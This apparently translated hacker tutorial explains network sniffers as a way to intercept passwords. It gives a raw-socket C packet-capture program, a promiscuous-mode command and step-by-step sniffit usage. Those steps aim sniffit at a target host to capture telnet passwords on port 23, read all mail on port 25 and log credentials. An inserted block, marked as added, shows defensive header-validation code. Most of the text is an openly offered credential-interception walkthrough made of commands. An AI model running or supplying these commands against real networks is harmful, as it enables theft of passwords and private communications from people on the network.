Sniffer means a network sniffer. It is a dangerous passive attack tool! With it, an attacker can monitor the state of the network, and the data flows and information transmitted over the network can be intercepted through network monitoring. Hackers often like to use it to intercept user passwords!
Sniffers can be divided into two types: hardware and software. Today we will talk about software sniffers. A sniffer can only capture the packets of one physical network segment. That is to say, there must be no router, switch or other device that blocks broadcast packets between you and the listening target. This is very important: it is why a sniffer cannot be used to intercept the communication of users on other segments!
Sniffing is a second-stage attack. That is to say, only when attackers have already got into the target system can they use the sniffing method to obtain more information. Besides passwords and user names, a sniffer can also obtain other important information, such as financial information transferred online. A sniffer can obtain almost any packet forwarded over the Ethernet segment. Sniffing is a complicated attack method, and generally only a hacker can use it. (As long as you understand it, you can try it; I learned it through practice myself!) For a new network user, even if a sniffer is successfully compiled and run on a host, no useful information is obtained: the traffic on the network is usually very large, so it is very difficult to find the wanted information if you receive all packets instead of filtering them; in addition, if you listen for a long time, the hard disk of the machine running the sniffer may fill up!
Now I want to show you a C program that implements the basic listening function. The comments explain each line!
/* Header files for the system and network functions used below */
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* IP and TCP packet header structures (bit-field order assumes a little-endian host such as x86) */
struct ip {
    unsigned int ip_length:4;        /* length of the IP header, in 32-bit words */
    unsigned int ip_version:4;       /* IP version, 4 for IPv4 */
    unsigned char ip_tos;            /* type of service */
    unsigned short ip_total_length;  /* total length of the IP packet */
    unsigned short ip_id;            /* identification field */
    unsigned short ip_flags;         /* flags and fragment offset */
    unsigned char ip_ttl;            /* time to live of the IP packet */
    unsigned char ip_protocol;       /* upper-layer protocol carried by IP */
    unsigned short ip_cksum;         /* IP header checksum */
    unsigned int ip_source;          /* source IP address */
    unsigned int ip_dest;            /* destination IP address */
};

struct tcp {
    unsigned short tcp_source_port;  /* TCP source port */
    unsigned short tcp_dest_port;    /* TCP destination port */
    unsigned int tcp_seqno;          /* TCP sequence number */
    unsigned int tcp_ackno;          /* next sequence number the sender expects */
    unsigned int tcp_res1:4,         /* reserved bits; the fields below are the TCP flags */
                 tcp_hlen:4,
                 tcp_fin:1,
                 tcp_syn:1,
                 tcp_rst:1,
                 tcp_psh:1,
                 tcp_ack:1,
                 tcp_urg:1,
                 tcp_res2:2;
    unsigned short tcp_winsize;      /* window size: maximum number of bytes that can be received */
    unsigned short tcp_cksum;        /* TCP checksum */
    unsigned short tcp_urgent;       /* urgent pointer */
};

/* Main function */
int main(void)
{
    int sock, bytes_received;
    socklen_t fromlen;
    char buffer[65535];
    struct sockaddr_in from;         /* socket address structure filled in by recvfrom() */
    struct ip *ip;                   /* IP and TCP header views of the received buffer */
    struct tcp *tcp;

    /* Create the socket. The first parameter is the address family; the Internet family is used.
       The second parameter is the socket type. SOCK_RAW is used here, which bypasses the
       transport layer and gives direct access to IP-layer packets; SOCK_RAW requires root.
       The third parameter is the protocol; IPPROTO_TCP selects TCP traffic. */
    sock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
    if (sock < 0) {
        perror("socket");
        return 1;
    }

    while (1) {
        fromlen = sizeof from;
        /* Receive data from the socket. recvfrom() expects a struct sockaddr *,
           so the sockaddr_in is passed with a cast. */
        bytes_received = recvfrom(sock, buffer, sizeof buffer, 0,
                                  (struct sockaddr *)&from, &fromlen);
        if (bytes_received < 0) {
            perror("recvfrom");
            return 1;
        }
        printf("\nBytes received: %4d\n", bytes_received);          /* number of bytes received */
        printf("Source address: %s\n", inet_ntoa(from.sin_addr));  /* source address */
        ip = (struct ip *)buffer;        /* view the received data through the predefined structure */
        printf("IP header length: %d\n", ip->ip_length);            /* IP header length */
        printf("Protocol: %d\n", ip->ip_protocol);                  /* 6 is TCP, 17 is UDP */
        /* The IP header length field counts 32-bit (4-byte) words, so multiplying
           it by 4 gives the byte offset of the TCP header */
        tcp = (struct tcp *)(buffer + 4 * ip->ip_length);
        printf("Source port: %d\n", ntohs(tcp->tcp_source_port));   /* source port */
        printf("Dest port: %d\n", ntohs(tcp->tcp_dest_port));       /* destination port */
    }
    return 0;
}
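The parsing step of the program above trusts the ip_length field and uses it as an offset without checking it against the buffer. The following added example (not from the original article) performs the same IHL*4 step on a constructed packet, but first validates the header length and the IPv4 header checksum, which is what a monitor or intrusion detection tool must do before trusting a header; the packet bytes and the function names are constructed for this example.

```c
#include <stdint.h>
#include <string.h>

struct parsed { unsigned proto, src_port, dst_port; };

/* RFC 1071 one's-complement sum over the IPv4 header; returns 0 when the stored checksum is valid */
uint16_t ip_header_checksum(const uint8_t *hdr, size_t len)
{
    uint32_t sum = 0;
    for (size_t i = 0; i + 1 < len; i += 2)
        sum += (uint32_t)hdr[i] << 8 | hdr[i + 1];
    if (len & 1) sum += (uint32_t)hdr[len - 1] << 8;         /* odd trailing byte */
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);    /* fold carries */
    return (uint16_t)~sum;
}

/* Returns 0 on success, -1 unless the bytes are a well-formed IPv4 packet carrying TCP.
   Unlike the raw-socket program above, the IHL field is validated before it is used as an offset. */
int parse_ipv4_tcp(const uint8_t *pkt, size_t len, struct parsed *out)
{
    if (len < 20 || (pkt[0] >> 4) != 4)
        return -1;                                   /* too short, or not IPv4 */
    size_t ihl_bytes = (size_t)(pkt[0] & 0x0f) * 4;  /* IHL counts 32-bit words */
    if (ihl_bytes < 20 || ihl_bytes + 20 > len)
        return -1;                                   /* bogus IHL would read past the buffer */
    if (ip_header_checksum(pkt, ihl_bytes) != 0)
        return -1;                                   /* corrupted header */
    out->proto = pkt[9];                             /* 6 is TCP, 17 is UDP */
    if (out->proto != 6) return -1;
    const uint8_t *tcp = pkt + ihl_bytes;            /* the same ihl*4 step as in the program */
    out->src_port = tcp[0] << 8 | tcp[1];            /* ports are big-endian on the wire */
    out->dst_port = tcp[2] << 8 | tcp[3];
    return 0;
}

/* TCP destination port of a well-formed packet, or -1 when parse_ipv4_tcp rejects it */
int tcp_dst_port(const uint8_t *pkt, size_t len)
{
    struct parsed p;
    return parse_ipv4_tcp(pkt, len, &p) == 0 ? (int)p.dst_port : -1;
}

/* Constructed sample: IPv4 (IHL 5, protocol 6), 192.168.0.2 -> 192.168.0.1, TCP SYN 40000 -> 23 */
const uint8_t sample_pkt[40] = {
    0x45, 0x00, 0x00, 0x28, 0x00, 0x01, 0x40, 0x00, 0x40, 0x06, 0xb9, 0x7b,
    0xc0, 0xa8, 0x00, 0x02, 0xc0, 0xa8, 0x00, 0x01,
    0x9c, 0x40, 0x00, 0x17, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
    0x50, 0x02, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00
};
```

Feeding the same bytes with the IHL nibble set to 15, or a truncated buffer, makes parse_ipv4_tcp return -1 instead of reading past the packet.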
The above C program is the simplest example to illustrate the receiving principle of a sniffer. It implements the sniffer's receiving function. Before running it, we also need to put the network card into promiscuous mode manually, with root permission:
ifconfig eth0 promisc
Here eth0 is assumed to be your Ethernet interface. Then run the compiled program (that is, the C program above) to see the received packets! (Important note: the function of this program is too simple. It only displays the source address, target address, source port, target port and other very basic information, which is of no use to you as it is, but you can change it.)
Now let's take a look at the sniffit program.
Sniffit is network listening software that runs on Linux, Solaris, SGI, NT and other platforms. It monitors the computers running TCP/IP and is intended for checking the security of TCP/IP traffic.
Install
Follow me step by step. Don't run away! If you run away, don't blame me!
1. Run tar zxvf sniffit.*.tgz to unpack the downloaded sniffit.*.tgz into the target folder. If the version is 0.3.7, you will see a sniffit.0.3.7 directory there.
2. Enter the sniffit.0.3.7 directory.
3. Run ./configure && make. If no unexpected error message appears on the terminal during the process, the compilation has succeeded and you get a binary file named sniffit; run it directly!
4. Finally, run make clean to remove the temporary files.
How to Use sniffit
sniffit command options

Option  Function
-v      Display version information.
-t      Listen to data sent to a specified IP address.
-s      Listen to IP packets flowing out from a specified IP address. The @ wildcard can be used, for example -t 192.168.@
-i      Interactive mode: a window is displayed in which you can see the machines currently connected to the network.
-I      Extended interactive mode; the other options are ignored. More powerful than -i.
-c      Run the program with a script (configuration file).
-F      Force the program to use the given network device.
-n      Also display non-IP packets, such as ARP and RARP.
-N      Run only the plugins; the other options are ignored.
Usage examples
Assume there are two hosts in one subnet: one runs sniffit, and the other, called xxx.com in the following steps, has the IP address 192.168.0.1.
1. Check whether sniffit runs:
sniffit:~# sniffit -d -p 7 -t 192.168.0.1
Open another window:
sniffit:~$ telnet xxx.com
We can see that sniffit captures the packets of the telnet connection to the echo service on port 7 of the other host.
2. Intercept the user password on xxx.com:
sniffit:~# sniffit -p 23 -t 192.168.0.1
This listens on port 23.
3. If the root user of the xxx.com host notices a strange FTP connection and wants to record its activity:
sniffit:~# sniffit -p 21 -l 0 -t 192.168.0.1
4. Read all mail going in and out of xxx.com:
sniffit:~# sniffit -p 25 -l 0 -b -t 192.168.0.1 &
or sniffit:~# sniffit -p 25 -l 0 -b -s 192.168.0.1 &
5. Listen to the packets entering and leaving 192.168.0.1 and monitor them fully:
sniffit:~# sniffit -P ipicmptcp -p 0 -b -a -d -x -s 192.168.0.1
6. Record passwords in the following way, then read them with the more 192* command:
sniffit:~# sniffit -p 23 -A . -t 192.168.0.1